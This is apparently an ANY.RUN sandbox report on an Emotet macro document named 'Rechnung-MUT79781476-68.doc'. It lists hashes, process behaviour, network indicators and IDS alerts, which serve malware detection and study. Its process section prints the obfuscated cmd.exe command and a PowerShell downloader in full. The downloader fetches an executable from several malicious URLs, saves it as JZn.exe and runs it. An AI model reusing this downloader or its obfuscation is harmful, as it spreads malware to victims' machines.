analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Rechnung-MUT79781476-68.doc

Full analysis: https://app.any.run/tasks/b6abe8dc-a347-4122-8a82-adbf68fa9173
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 15, 2018, 13:43:17
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
emotet
maldoc-1
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Hadley, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 14 05:31:00 2018, Last Saved Time/Date: Wed Nov 14 05:31:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

578744E765EAF4DA76938C97A006AE66

SHA1:

1A699F32E464A320A62DDCBC9642B523432B78BF

SHA256:

91F691E9C9C5C90E8296212B8154C51127EF839E297A2ADE318D8199B2CE517C

SSDEEP:

1536:qjkqGO5ocn1kp59gxBK85fBt+a9Oy4z4He519y9ZjFz4AZUEw:P41k/W48Sz4He519y9ZjFz4AZUt

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3708)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3708)
    • Application was dropped or rewritten from another process

      • JZn.exe (PID: 328)
      • JZn.exe (PID: 3204)
      • lpiograd.exe (PID: 3208)
      • lpiograd.exe (PID: 3024)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3420)
    • Emotet process was detected

      • lpiograd.exe (PID: 3024)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 3768)
    • Creates files in the user directory

      • powershell.exe (PID: 3420)
    • Executable content was dropped or overwritten

      • JZn.exe (PID: 328)
      • powershell.exe (PID: 3420)
    • Connects to unusual port

      • lpiograd.exe (PID: 3208)
    • Starts itself from another location

      • JZn.exe (PID: 328)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3708)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3708)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: Hadley
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:11:14 05:31:00
ModifyDate: 2018:11:14 05:31:00
Pages: 1
Words: 2
Characters: 13
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 14
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
7
Malicious processes
5
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs powershell.exe jzn.exe no specs jzn.exe #EMOTET lpiograd.exe no specs lpiograd.exe

Process information

PID
CMD
Path
Indicators
Parent process
3708"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rechnung-MUT79781476-68.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3768cmd /V^:ON/C"^s^e^t c^E=^X0^u/[^Z^5nR^fd^H^9^k.'NC^i^MPv^G^}^x(^b^ ^-\+^$p^B^6)^e^T^@Jl^mwSA^]^j;q,ctoV^2L^1^{g^Or^I^h^8^E^=z^Wsa:^y&&^for %^a ^in (^3^2^,52,^42,36,^60^,68,6^2^,^36,^4^0^,^4^0^,2^7,^3^1^,48,^1^8^,7,^6^5^,^15,39^,1^1^,6^2,^15^,^4^7^,31^,^18^,^8^,^0^,6^5^,1^5,62,51^,^5^1,3^2,^7^0,3^,^3^,6^8^,51,2,^10,^5^6,^1,1,^14,26^,^18,66^,3,7,^37^,^0,6^8,^2^2,^3^6^,^6^3^,^5^3,^1^1,^3^8^,^6^2,^5^1,5^1^,^3^2,^7^0,3,^3,^52^,7^,40^,18,^7,36,^36,^60,36^,^58,18^,^6^8,^51,60,^6^9^,^5^1,^18^,^5^2^,7,14^,5^0,^52^,4^1,3,6^4^,^2^2^,46^,58,^5^5^,^5^1^,^2^1^,38^,6^2,^5^1^,51,32^,7^0,^3,3,^4^1,6^9,^60,^5^0,5^2,^5^0^,6^9^,^68,6^9,^7,52,^1^4^,1^8,51^,^3^,51,0^,^1^8^,5^2^,^34^,^13,4^3,4^6^,^38,6^2,5^1,5^1,^32,^70,^3^,3,51,^6^0,^6^9,7,68^,^4^0^,^69,4^1,^3^2,^2^,7^,^58^,1^4^,^50^,5^2^,^41^,3^,36^,5^4,4^0,^39,^8,^48,0^,5^9^,19,38,^6^2^,51^,5^1,^3^2^,^70^,^3^,^3,^4^1,2,1^0,6^9^,^7^,66,^6^9,^6^8,7^1^,^68^,3^6,^6^0,^21,^1^8^,5^0^,18^,^52^,6^8^,69,7^1,^69,40,^69^,^14^,50^,52,4^1,^3,^12^,^2^1^,44^,^3^2^,^37,^1^3,^10,1^8,50^,6^,^1^5^,14^,^4^3^,^32^,40,18,^5^1^,^2^5,^1^5^,^38,1^5^,3^5,47^,31^,^48,^67^,^60,6^5,^25^,4^,^43,71,^68^,^5^1,3^6^,^41^,^14^,6^1^,^5^9,1^4^,^20^,^69^,^5^1^,^62,^4^5,^70^,70^,^22,^36^,^51,3^7^,36^,^41,^3^2,20^,^6^9^,^5^1^,6^2^,2^5,^3^5^,3^0^,^1^5^,2^9,^39^,5^,7,^1^4^,^3^6^,2^4,36,^1^5^,3^5,4^7,^31,^5^0,50^,8^,2^7,6^5^,1^6^,3^6^,42^,2^8^,^5^9,2^6,46,^36,^5^0^,^51^,^27^,2^8,5^0,5^2^,^4^1^,^27,^1^5^,^4^1,68,2^4,^4^1^,40,^54,14^,24,41^,^40,^6^2,51,51,^32,^1^5^,4^7,3^1,32,^1^7^,^37^,2^7,65^,^27,^1^6^,36^,^4^2^,^28,5^9,^26^,46,^36^,5^0,^51,^27^,^28,^50,^52,41,2^7,^15^,^6^9,^1^0^,^52^,1^0,26^,^1^4,68,51,^60^,^3^6,6^9^,^4^1,15^,^47^,^9^,^5^2,^6^0^,^36^,^69^,50^,^6^2^,25^,3^1^,^26,3^2,67^,2^7,^1^8,^7,2^7,31^,^18^,8^,^0^,3^5^,57^,^5^1^,^60,71^,^57^,31,^5^0^,^50^,8,1^4^,^5^2^,3^2,3^6,7,^2^5,^15^,^2^2,64,3^7,1^5,49,^3^1,26^,^32,^67^,^49^,1^,35^,^4^7^,^31,50^,50^,8,^14,68,36^,7,1^0,2^5^,^35,47,3^1^,32,^1^7^,^37^,^1^4,^52,3^2,^3^6,7,^25,^35,^47,31^,3^2^,17,3^7^,14^,^5^1,^71^,^3^2,^36,^27^,6^5,^27^,^56,47,^3^1^,^3^2,^1^7,^37,^1^4^,4^2^,60,^1^8,^51^,^36^,^25,3^1,^50,^5^0,8^,14,60^,36,^6^8,32,52^,7^,6^8^,^3^6^,3^3^,^52^,^10^,^71,35,4^7^,31^,^32^,1^7,^3^7^,14,6^8^,^6^9^,^2^1,^36^,51^,5^2,^9^,1^8,^4^0^,^36,^2^5,^31,48,67,^60^,3^5^,^4^7^,4^3^,51^,69^,^60^,5^1,^28,2^0^,60,52^,^5^0,36,68^,^6^8^,^27^,3^1^,^4^8,6^7^,6^0^,4^7^,26^,6^0^,36^,69^,13,^23,5^0,6^9,^5^1,^50^,^6^2,5^7^,^23,2^3,27^,^2^7^,^27,^2^7,^27,27^,2^7^,^2^7,27^,^27^,2^7^,^2^7^,^27,2^7^,^2^7^,^2^7^,^27,7^6)d^o ^s^e^t ^3w^p=!^3w^p!!c^E:~%^a,1!&&^if %^a ^g^e^q 7^6 c^a^l^l %^3w^p:~^-53^6%" C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3420powershell $qin='JHh';$iRX='http://stud100.biz/nTXsGe8VH@http://onlineeregistration.com/EGjgLtv@http://marcocasano.it/tXio6kSj@http://translampung.com/e2lJRqXOM@http://mudanzasyserviciosayala.com/9vApTkdic5'.Split('@');$qWr=([System.IO.Path]::GetTempPath()+'\JZn.exe');$ccR =New-Object -com 'msxml2.xmlhttp';$pCT = New-Object -com 'adodb.stream';foreach($bpW in $iRX){try{$ccR.open('GET',$bpW,0);$ccR.send();$pCT.open();$pCT.type = 1;$pCT.write($ccR.responseBody);$pCT.savetofile($qWr);Start-Process $qWr;break}catch{}} C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3204"C:\Users\admin\AppData\Local\Temp\JZn.exe" C:\Users\admin\AppData\Local\Temp\JZn.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
328"C:\Users\admin\AppData\Local\Temp\JZn.exe"C:\Users\admin\AppData\Local\Temp\JZn.exe
JZn.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3024"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
JZn.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3208"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
lpiograd.exe
User:
admin
Integrity Level:
MEDIUM
Total events
1 680
Read events
1 265
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
3708WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9E00.tmp.cvr
MD5:
SHA256:
3420powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L8XEULCHXSN8XGE6MX4V.temp
MD5:
SHA256:
3420powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5dad33.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
3708WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:CC241CBE453475E8F8171B4F2646855D
SHA256:A2EB6C3F36EADCFE5C638DBB6AB89AB42400F4E039E89525E157CD8BCBF41F8A
3420powershell.exeC:\Users\admin\AppData\Local\Temp\JZn.exeexecutable
MD5:8847D577D3CA8475E2B53E5A3C5E9AE4
SHA256:C40E8A646B27F544ADF46130A314D9079B2F2DAE6A73C64109C669D1BE5A6B36
3420powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
3708WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$chnung-MUT79781476-68.docpgc
MD5:BE80A62ED96CFBF2C8CDED8513D57501
SHA256:714346B81C63C457ADE49716380C167165D170F2AAE34992BB918AEA5A6B14E5
328JZn.exeC:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exeexecutable
MD5:8847D577D3CA8475E2B53E5A3C5E9AE4
SHA256:C40E8A646B27F544ADF46130A314D9079B2F2DAE6A73C64109C669D1BE5A6B36
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3420
powershell.exe
GET
200
45.252.248.22:80
http://stud100.biz/nTXsGe8VH/
VN
executable
444 Kb
malicious
3420
powershell.exe
GET
301
45.252.248.22:80
http://stud100.biz/nTXsGe8VH
VN
html
617 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3208
lpiograd.exe
50.78.167.65:7080
Comcast Cable Communications, LLC
US
malicious
3420
powershell.exe
45.252.248.22:80
stud100.biz
AZDIGI Corporation
VN
suspicious

DNS requests

Domain
IP
Reputation
stud100.biz
  • 45.252.248.22
malicious

Threats

PID
Process
Class
Message
3420
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3420
powershell.exe
A Network Trojan was detected
ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2
3420
powershell.exe
Misc activity
ET INFO Possible EXE Download From Suspicious TLD
3420
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info